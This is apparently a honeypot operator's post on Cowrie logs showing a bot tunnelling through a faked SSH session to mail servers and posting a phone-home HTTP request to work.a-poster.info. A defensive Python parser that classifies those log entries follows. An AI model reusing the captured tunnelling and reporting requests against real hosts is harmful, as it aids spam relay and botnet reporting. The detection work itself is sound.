Honeynet outbound probes
My Cowrie honeypot is now seeing a surge of outbound SSH tunnel probes, both towards various mail servers and also towards a specific web server, probably with the purpose of reporting a successful intrusion. The honeypot has seen outbound attempts before, but not as persistent as with this bot from .ru.
Cowrie fakes successful SSH tunneling, so the bot is at least kept somewhat busy. The honeypot is also in a very tight network environment with limited possibilities for outbound connections.
Here are some examples, formatted for readability:
2016-02-22 01:43:00+0100 [SSHService ssh-connection on HoneyPotTransport,1580,193.169.52.214] direct-tcp connection request to 69.50.231.136:25
2016-02-22 01:43:01+0100 [SSHService ssh-connection on HoneyPotTransport,1580,193.169.52.214] direct-tcp connection request to 202.108.6.242:587
2016-02-22 01:43:54+0100 [SSHChannel None (883) on SSHService ssh-connection on HoneyPotTransport,1580,193.169.52.214] direct-tcp forward to 64.233.164.108:465 with data '\x16\x03\x01\x00S\x01\x00\x00O\x03\x01V\x15\xbc\xc0\x0c \x8fK\xf4\x9d\xb4\xecx\xaf\x13t;\xdeR\xf6c\r6\x93sv\xc7 \xacXq\xd0\xe8\x02\x00\x00(\x009\x008\x005\x00\x16\x00 \x13\x00\n\x003\x002\x00/\x00\x07\x00\x05\x00\x04\x00 \x15\x00\x12\x00\t\x00\x14\x00\x11\x00\x08\x00\x06\x00\x03\x01\x00'
2016-02-22 02:00:28+0100 [SSHChannel None (979) on SSHService ssh-connection on HoneyPotTransport,1580,193.169.52.214] direct-tcp forward to 37.1.206.139:25000 with data 'POST / HTTP/1.1\r\nUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)\r\nContent-Type: application/x-www-form-urlencoded\r\n Connection: close\r\nContent-Length: 21\r\nHost: work.a-poster.info\r\n\r\n'
2016-02-22 03:39:18+0100 [SSHChannel None (0) on SSHService ssh-connection on HoneyPotTransport,1589,193.169.52.212] direct-tcp forward to 37.1.206.139:80 with data 'POST / HTTP/1.1\r\nUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)\r\nContent-Type: application/x-www-form-urlencoded\r\n Connection: close\r\nContent-Length: 21\r\nHost: work.a-poster.info\r\n\r\n data=ffddaffeccedabae'
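To turn lines like these into something you can alert on, here is a small parser and classifier for Cowrie's direct-tcp log entries. It is an added example, not part of the original post and not Cowrie's own code: it pulls out the attacker IP, session, destination and port, decodes the repr'd payload, and tells a TLS ClientHello (record type 0x16, handshake type 0x01, which is what the bot sends to port 465) apart from a plain HTTP request, whose Host header it extracts. The sample log is constructed from the lines quoted above, with the payloads shortened and the readability spacing removed; the port-to-service mapping is a plain assumption for the mail ports seen here.

```python
import ast
import re
from collections import Counter, defaultdict

# Constructed sample, modelled on the Cowrie lines quoted in the post
# (payloads shortened to the bytes the classifier needs; wrap spacing removed).
SAMPLE_LOG = r"""
2016-02-22 01:43:00+0100 [SSHService ssh-connection on HoneyPotTransport,1580,193.169.52.214] direct-tcp connection request to 69.50.231.136:25
2016-02-22 01:43:01+0100 [SSHService ssh-connection on HoneyPotTransport,1580,193.169.52.214] direct-tcp connection request to 202.108.6.242:587
2016-02-22 01:43:54+0100 [SSHChannel None (883) on SSHService ssh-connection on HoneyPotTransport,1580,193.169.52.214] direct-tcp forward to 64.233.164.108:465 with data '\x16\x03\x01\x00S\x01\x00\x00O\x03\x01V\x15\xbc\xc0'
2016-02-22 02:00:28+0100 [SSHChannel None (979) on SSHService ssh-connection on HoneyPotTransport,1580,193.169.52.214] direct-tcp forward to 37.1.206.139:25000 with data 'POST / HTTP/1.1\r\nUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)\r\nContent-Type: application/x-www-form-urlencoded\r\nConnection: close\r\nContent-Length: 21\r\nHost: work.a-poster.info\r\n\r\n'
2016-02-22 03:39:18+0100 [SSHChannel None (0) on SSHService ssh-connection on HoneyPotTransport,1589,193.169.52.212] direct-tcp forward to 37.1.206.139:80 with data 'POST / HTTP/1.1\r\nUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)\r\nContent-Type: application/x-www-form-urlencoded\r\nConnection: close\r\nContent-Length: 21\r\nHost: work.a-poster.info\r\n\r\ndata=ffddaffeccedabae'
"""

# "connection request to" is logged when the channel is opened, "forward to ... with data"
# once the client pushes bytes through the (faked) tunnel.
LINE_RE = re.compile(
    r"^(?P<ts>\S+ \S+) \[(?P<ctx>[^\]]*)\] direct-tcp "
    r"(?:connection request to|forward to) (?P<dst>[\d.]+):(?P<port>\d+)"
    r"(?: with data (?P<data>'.*'))?$"
)

# Assumed mapping for the mail ports seen in the post; anything else is reported as tcp/N.
MAIL_PORTS = {25: "smtp", 465: "smtps", 587: "submission"}


def parse_forward(line):
    """Return a dict for a direct-tcp log line, or None if the line is something else."""
    m = LINE_RE.match(line)
    if not m:
        return None
    # The bracketed context ends with ",<session id>,<attacker ip>".
    ctx, session, src = m.group("ctx").rsplit(",", 2)
    data = m.group("data")
    # Cowrie logs the payload as a Python string repr; literal_eval undoes the escaping.
    payload = ast.literal_eval(data).encode("latin-1") if data else b""
    return {"ts": m.group("ts"), "src": src, "session": int(session),
            "dst": m.group("dst"), "port": int(m.group("port")), "payload": payload}


def classify_payload(payload):
    """Label the first bytes the client pushed through the tunnel."""
    if not payload:
        return "no-data"
    # TLS record header: content type 0x16 (handshake), version 3.x, 2-byte length,
    # then handshake type 0x01 = ClientHello.
    if len(payload) >= 6 and payload[0] == 0x16 and payload[1] == 0x03 and payload[5] == 0x01:
        return "tls-client-hello"
    request_line = payload.split(b"\r\n", 1)[0]
    if re.match(rb"^(GET|POST|HEAD|PUT) \S+ HTTP/1\.[01]$", request_line):
        return "http-request"
    return "unknown"


def http_host(payload):
    """Host header of an HTTP request payload, or None if absent."""
    headers = payload.split(b"\r\n\r\n", 1)[0].split(b"\r\n")[1:]
    for hdr in headers:
        name, _, value = hdr.partition(b":")
        if name.strip().lower() == b"host":
            return value.strip().decode("ascii", "replace")
    return None


def summarize(log_text):
    """Per attacker IP: Counter of (service, payload kind); plus a Counter of HTTP Host targets."""
    per_src = defaultdict(Counter)
    hosts = Counter()
    for line in log_text.splitlines():
        ev = parse_forward(line)
        if ev is None:
            continue
        kind = classify_payload(ev["payload"])
        service = MAIL_PORTS.get(ev["port"], "tcp/%d" % ev["port"])
        per_src[ev["src"]][(service, kind)] += 1
        if kind == "http-request":
            host = http_host(ev["payload"])
            if host:
                hosts[(host, ev["dst"], ev["port"])] += 1
    return per_src, hosts


if __name__ == "__main__":
    per_src, hosts = summarize(SAMPLE_LOG)
    for src, counts in per_src.items():
        print(src, dict(counts))
    for (host, dst, port), n in hosts.items():
        print("HTTP Host %s -> %s:%d (%d request(s))" % (host, dst, port, n))
```

Run against the real cowrie.log instead of SAMPLE_LOG and the two counters give you what the post describes at a glance: which sources are tunnelling to mail ports (spam relay attempts) and which Host header they phone home to over HTTP, regardless of the destination port they use for it.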